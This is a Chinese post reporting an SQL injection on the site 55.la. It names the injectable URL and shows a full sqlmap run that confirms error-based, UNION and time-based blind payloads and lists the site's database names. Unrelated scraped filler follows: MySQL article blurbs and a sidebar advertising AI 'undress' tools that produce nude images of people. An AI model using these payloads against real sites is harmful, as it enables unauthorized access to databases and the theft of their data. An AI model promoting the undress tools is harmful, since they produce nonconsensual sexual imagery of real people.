我拉网主站一处sql注入
注入点
<code>http://www.55.la/run/ding_banner.php?bid=21022</code>
<code>注入地址:http://www.55.la/run/ding_banner.php?bid=21022<br><br> sqlmap/1.0-dev - automatic SQL injection and database takeover tool<br> http://www.sqlmap.org<br><br>[!] legal disclaimer: usage of sqlmap for attacking targets without prior mutual<br> consent is illegal. It is the end user's responsibility to obey all applicable<br>local, state and federal laws. Authors assume no liability and are not responsib<br>le for any misuse or damage caused by this program<br><br>[*] starting at 02:04:07<br><br>[02:04:07] [INFO] using 'C:/Users/Administrator/Desktop/渗透工具/sqlmap GUI汉化<br>版/rar/output/www.55.la/session' as session file<br>[02:04:07] [INFO] testing connection to the target url<br>[02:04:07] [INFO] testing if the url is stable, wait a few seconds<br>[02:04:08] [INFO] url is stable<br>[02:04:08] [INFO] testing if GET parameter 'bid' is dynamic<br>[02:04:09] [INFO] confirming that GET parameter 'bid' is dynamic<br>[02:04:09] [INFO] GET parameter 'bid' is dynamic<br>[02:04:09] [INFO] heuristic test shows that GET parameter 'bid' might be injecta<br>ble (possible DBMS: MySQL)<br>[02:04:09] [INFO] testing sql injection on GET parameter 'bid'<br>[02:04:09] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'<br>[02:04:10] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause<br>'<br>[02:04:11] [INFO] GET parameter 'bid' is 'MySQL >= 5.0 AND error-based - WHERE o<br>r HAVING clause' injectable<br>[02:04:11] [INFO] testing 'MySQL > 5.0.11 stacked queries'<br>[02:04:11] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'<br>[02:04:21] [INFO] GET parameter 'bid' is 'MySQL > 5.0.11 AND time-based blind' i<br>njectable<br>[02:04:21] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'<br>[02:04:24] [INFO] target url appears to be UNION injectable with 1 columns<br>[02:04:25] [INFO] GET parameter 'bid' is 'MySQL UNION query (NULL) - 1 to 10 col<br>umns' injectable<br>GET parameter 'bid' is vulnerable. Do you want to keep testing the others (if an<br>y)? [y/N] y<br>sqlmap identified the following injection points with a total of 32 HTTP(s) requ<br>ests:<br>---<br>Place: GET<br>Parameter: bid<br> Type: error-based<br> Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause<br> Payload: bid=21022' AND (SELECT 3637 FROM(SELECT COUNT(*),CONCAT(0x3a6f636a3<br>a,(SELECT (CASE WHEN (3637=3637) THEN 1 ELSE 0 END)),0x3a7862753a,FLOOR(RAND(0)*<br>2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'uYVe'='uYVe<br><br> Type: UNION query<br> Title: MySQL UNION query (NULL) - 1 column<br> Payload: bid=-1700' UNION SELECT CONCAT(0x3a6f636a3a,0x676e4261505364745265,<br>0x3a7862753a)# AND 'EXgA'='EXgA<br><br> Type: AND/OR time-based blind<br> Title: MySQL > 5.0.11 AND time-based blind<br> Payload: bid=21022' AND SLEEP(5) AND 'xros'='xros<br>---<br><br>[02:04:27] [INFO] the back-end DBMS is MySQL<br><br>web application technology: Nginx, PHP 5.3.24<br>back-end DBMS: MySQL 5.0<br>[02:04:27] [INFO] fetching database names<br>[02:04:30] [INFO] the SQL query used returns 5 entries<br>[02:04:30] [INFO] retrieved: "information_schema"<br>[02:04:37] [INFO] retrieved: "help55la"<br>[02:04:37] [INFO] retrieved: "test"<br>[02:04:37] [INFO] retrieved: "u_run55_la"<br>[02:04:37] [INFO] retrieved: "wstp8_com"<br>available databases [5]:<br>[*] help55la<br>[*] information_schema<br>[*] test<br>[*] u_run55_la<br>[*] wstp8_com<br><br>[02:04:37] [INFO] Fetched data logged to text files under 'C:/Users/Administrato<br>r/Desktop/渗透工具/sqlmap GUI汉化版/rar/output/www.55.la'<br><br>[*] shutting down at 02:04:37</code>

This article explores optimizing MySQL memory usage in Docker. It discusses monitoring techniques (Docker stats, Performance Schema, external tools) and configuration strategies. These include Docker memory limits, swapping, and cgroups, alongside

This article addresses MySQL's "unable to open shared library" error. The issue stems from MySQL's inability to locate necessary shared libraries (.so/.dll files). Solutions involve verifying library installation via the system's package m

The article discusses using MySQL's ALTER TABLE statement to modify tables, including adding/dropping columns, renaming tables/columns, and changing column data types.

This article compares installing MySQL on Linux directly versus using Podman containers, with/without phpMyAdmin. It details installation steps for each method, emphasizing Podman's advantages in isolation, portability, and reproducibility, but also

This article provides a comprehensive overview of SQLite, a self-contained, serverless relational database. It details SQLite's advantages (simplicity, portability, ease of use) and disadvantages (concurrency limitations, scalability challenges). C

This guide demonstrates installing and managing multiple MySQL versions on macOS using Homebrew. It emphasizes using Homebrew to isolate installations, preventing conflicts. The article details installation, starting/stopping services, and best pra

Article discusses configuring SSL/TLS encryption for MySQL, including certificate generation and verification. Main issue is using self-signed certificates' security implications.[Character count: 159]

Article discusses popular MySQL GUI tools like MySQL Workbench and phpMyAdmin, comparing their features and suitability for beginners and advanced users.[159 characters]


Hot AI Tools

Undresser.AI Undress
AI-powered app for creating realistic nude photos

AI Clothes Remover
Online AI tool for removing clothes from photos.

Undress AI Tool
Undress images for free

Clothoff.io
AI clothes remover

AI Hentai Generator
Generate AI Hentai for free.

Hot Article

Hot Tools

WebStorm Mac version
Useful JavaScript development tools

SublimeText3 Linux new version
SublimeText3 Linux latest version

ZendStudio 13.5.1 Mac
Powerful PHP integrated development environment

SublimeText3 Mac version
God-level code editing software (SublimeText3)

SublimeText3 English version
Recommended: Win version, supports code prompts!
